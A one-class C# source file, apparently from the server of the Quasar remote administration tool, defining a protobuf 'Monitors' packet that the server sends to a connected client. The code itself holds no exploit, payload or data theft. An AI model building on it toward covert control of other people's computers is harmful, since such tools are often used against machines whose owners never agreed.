Quasar/Server/Core/Packets/ServerPackets/Monitors.cs

16 lines
272 B
C#

using ProtoBuf;
namespace xServer.Core.Packets.ServerPackets
{
[ProtoContract]
public class Monitors : IPacket
{
public Monitors() { }
public void Execute(Client client)
{
client.Send<Monitors>(this);
}
}
}